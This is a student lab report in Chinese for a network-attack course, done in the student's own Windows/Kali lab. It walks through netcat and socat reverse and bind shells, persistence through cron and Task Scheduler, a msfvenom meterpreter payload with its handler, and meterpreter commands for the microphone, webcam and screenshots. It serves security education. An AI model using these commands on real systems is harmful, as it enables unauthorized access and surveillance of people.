网络对抗技术Exp2-后门原理与实践
20191330雷清逸 网络对抗技术Exp2-后门原理与实践
- 学习内容:使用nc实现win,mac,Linux间的后门连接;meterpreter的应用;MSF POST 模块的应用
- 学习目标:建立一个后门连接是如此的简单,功能又如此强大。通过亲手实践并了解这一事实,从而提高自己的安全意识 。
一、基础知识
- 1.1 后门概念
后门就是不经过正常认证流程而访问系统的通道。
哪里有后门呢? - 编译器留后门
- 操作系统留后门
- 最常见的当然还是应用程序中留后门
- 还有就是潜伏于操作系统中或伪装为特定应用的专用后门程序。
后门攻击流程:
* 首先得有这么一个程序
* netcat 系列
* meterpreter
* intersect
* ...特别多
* 其次得放到系统里
* 正版软件故意或被攻击,包含后门
* 正版库文件中包含后门
* 本质上,需要诱骗你下载操作的,都属于各种钓鱼吧
* 安装包中包含后门,放到网上供下载
* 绑定到特定文件中,放到网上供下载
* 直接发送恶意程序给你
* 直接发送攻击性钓鱼链接给你,恶意网站种马
* 捡到个U盘,打开个文件看看?
* 煤女帅锅拿U盘直接拷给你
* 攻击系统漏洞,获取控制权后,安装后门
* 再次还得运行起来
* 开机自启动技术
* win的定时任务
* linux的cron
* 伪装成常用软件,诱使用户点击
* 木马化正常软件
* 最后还得不被本机的恶意代码检测程序发现
* 恶意代码免杀技术
* 也不能被本机的或网络上的防火墙发现
* 反弹式连接
* 加密连接
* 隧道技术
-
1.2 常用后门工具
-
NC和Netcat:底层工具,进行基本的TCP、UDP数据收发,常常被与其他工具结合使用,起到后门的作用。
-
Meterpreter:一个用来生成后门程序的程序。
-
SoCat:相当于Netcat++,一个超级Netcat工具。在Windows下可以下载socat.rar,使用README作为参考。任何代理、转发等功能都可以用该工具实现。
-
1.3 实验内容
(1)使用netcat获取主机操作Shell,cron启动 (1分)
(2)使用socat获取主机操作Shell, 任务计划启动 (1分)
(3)使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell(1分)
(4)使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权 (1分)
(5)可选加分内容:使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell(2分)加分内容一并写入本实验报告。
(评分者注意,附加分写在评论里,不要和主分数混在一起)
- 1.4 问答题
(1)例举你能想到的一个后门进入到你系统中的可能方式?
(2)例举你知道的后门如何启动起来(win及linux)的方式?
(3)Meterpreter有哪些给你映像深刻的功能?
(4)如何发现自己有系统有没有被安装后门?
二、实践操作
实验环境
主机:Windows 10;
靶机:Kali Linux Debian 10;
查看主机IP地址:
截图如下:
主机地址为:192.168.3.100
查看靶机IP地址:
截图如下:
靶机地址为:192.168.58.128
相互Ping通截图:
2.1 使用netcat获取主机操作Shell,启动cron
-
2.1.1 在主机中使用ncat -l -p 1330(个人学号后四位)监听本机的1330端口
截图如下:
-
2.1.2 在虚拟机中使用nc 192.168.3.100(主机IP) 1330 -e /bin/sh连接主机反弹shell
截图如下:
成功getshell,截图如下:
- 2.1.3 在虚拟机中获取主机shell
在虚拟机中用nc -l -p 1330 监听主机1330 端口
截图如下:
在主机中用ncat -e cmd 192.168.58.128 1330,成功获取到主机shell
截图如下:
成功getshell,截图如下:
- 2.1.4 在虚拟机中启动cron并在主机监听
先在虚拟机上用crontab -e指令编辑一条定时任务(crontab指令增加一条定时任务,-e表示编辑,输入2表示选择vim编辑器)
截图如下:
在最后一行添加55 * * * * nc 192.168.3.100 1330 -e /bin/sh,即在每个小时的第55分钟反向连接Windows主机的1330端口
截图如下:
等到每小时的55分,在ip地址为192.168.3.100的主机端用ncat -l -p 1330打开监听即可
截图如下:
成功截图如下:
此外,也可以开一个非反弹式后门,在cron中写入nc -l -p 1330 -e /bin/sh,这是攻击机能随时通过nc 主机ip 1330 获得虚拟机的一个Shell
2.2 使用socat获取主机操作Shell,任务计划启动
- 2.2.1 在Windows获得Linux Shell
在Kali中用man socat查看使用说明
截图如下:
在Windows中按Win+R,再输入compmgmt.msc打开计算机管理
截图如下:
在系统工具中的任务计划程序中创建任务
设置任务名称
设置触发器
下一步是新建操作,但在新建操作前,我们需要在Windows上下载socat.rar,并解压后使用。
新建操作,操作设置为启动程序socat.exe,并添加参数tcp-listen:1330 exec:cmd.exe,pty,stderr,这个命令的作用是把cmd.exe绑定到端口1330,同时把cmd.exe的stderr重定向
设置好后我们按下Win+L(通用)或者F10(一些电脑适用)锁定工作台,即把电脑锁屏。解锁后由于Windows防火墙没关,发现弹出UAC警告,说明之前设置成功
如图所示,设置成功:
在Kali中输入命令socat - tcp:192.168.3.100:1330
截图如下:
成功获取Windows的Shell
截图如下:
2.3 使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell
在Kali上生成后门可执行程序20191330_backdoor.exe
输入msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.58.128 LPORT=1330 -f exe > 20191330_backdoor.exe,其中
- LHOST为反弹回连的IP,在这里是要反弹给Kali,也就是Kali的IP
- LPORT是回连的端口
- -p 使用的payload。
- payload翻译为有效载荷,就是被运输有东西。这里windows/meterpreter/reverse_tcp就是一段shellcode。
- -f 生成文件的类型
- > 输出到哪个文件
截图如下:
在Windows上打开监听
截图如下:
在Kali上用nc 192.168.3.100 1330 < 20191330_backdoor.exe将生成的20191330_backdoor.exe后门程序传过去
截图如下:
在kali上使用msfconsole指令进入msf控制台
截图如下:
对msf控制台进行配置,依次输入以下命令
use exploit/multi/handler #使用监听模块,设置payload
set payload windows/meterpreter/reverse_tcp #使用和生成后门程序时相同的payload
set LHOST 192.168.58.128 #KaliIP,和生成后门程序时指定的IP相同
set LPORT 1330
截图如下:
配置完后如图所示:
接着输入exploit进行监听,在Windows在打开20191330_backdoor.exe后成功获取到Windows的shell
截图如下:
2.4 使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权
-
2.4.1 获取目标主机音频
在之前进入的MSF exploit中输入record_mic指令进行录音(-d可设置时长)
截图如下:
-
2.4.2 获取目标主机摄像头
输入webcam_snap指令控制摄像头进行拍照
-
2.4.3 截取主机屏幕
使用screenshot指令可以进行截屏
2.5 使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell(选做)
- 2.5.1 前期准备
关闭地址随机化,设置堆栈可执行
代码如下:
echo "0" > /proc/sys/kernel/randomize_va_space
more /proc/sys/kernel/randomize_va_space
截图如下:
三、基础题问答
- (1)例举你能想到的一个后门进入到你系统中的可能方式?
答:例如给我发送钓鱼网站,将1CBC的网站伪装成ICBC,诱导我下载所谓的“安全工具”,这些“安全工具”里,很有可能就被植入了后门程序。
(2)例举你知道的后门如何启动起来(win及linux)的方式?
答:
Win:开机自启;与常用软件捆绑启动;添加用户初始化程序。
Linux:与脚本捆绑触发。
(3)Meterpreter有哪些给你映像深刻的功能?
答:快速提权;生成后门快速便捷;使用方便;程序驻留在内存内,不写入磁盘。
(4)如何发现自己有系统有没有被安装后门?
答:使用火绒等检测软件检测;发现电脑容易出现蓝屏等异常情况;检查用户权限有无扩散。
实验心得
本次实验向我们展示了后门程序的破坏力,它能够轻而易举地监听我们的麦克风;能够调用我们的摄像头;能够截取我们的屏幕截图等等,通过这次实验,我学习了NC、Netcat、socat和Meterpreter等软件的简单操作,更体会到网络时代带给我们的危害,在日后使用计算机时,应学习此次实验中学到的知识,经常使用杀毒软件自查电脑有无后门程序,谨慎下载网络上的资源,从而做到更加安全地使用计算机。
本次实验难度一般,在课题指导员博客的指导下,实践操作环节没有出现太大的问题,总体来说完成度较高。